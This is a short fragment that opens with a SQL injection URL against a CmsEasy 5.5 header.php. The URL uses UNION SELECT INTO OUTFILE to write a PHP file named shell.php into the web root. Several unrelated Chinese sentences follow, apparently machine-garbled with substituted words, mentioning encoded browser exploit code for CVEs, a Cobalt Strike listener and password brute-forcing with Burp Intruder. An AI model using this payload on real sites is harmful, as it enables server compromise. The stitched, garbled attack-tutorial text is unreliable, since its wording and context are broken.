http://site.com/CmsEasy_5.5_UTF-8_20140818/d/file/uploads/celive/admin/live/header.php?xajax=GetEndChat&xajaxargs=xxxxx' union select/**/'<?php phpinfo?>' into outfile 'D:/APMSERVER/APMServ5.2.6/www/htdocs/CmsEasy_5.5_UTF-8_20140818/d/file/uploads/upload/images/shell.php'#i1代码引进的js文件是被Base64编码过的,解开之后是CVE-2013-2551的缝隙运用代码,由于该缝隙时刻较久,因而很少有进犯包会挑选这个缝隙。
客户端GUI发动后,让咱们创立一个监听,从”Cobalt Strike菜单点击“Listeners:其间f2函数则载入了一个Flash文件,该文件会通过RC4加密办法把实践的缝隙运用代码加密到BinaryData中,解开后依据代码承认是CVE-2019-8651。
下面咱们运用Burpsuite的Intruder模块来对暗码进行暴力破解。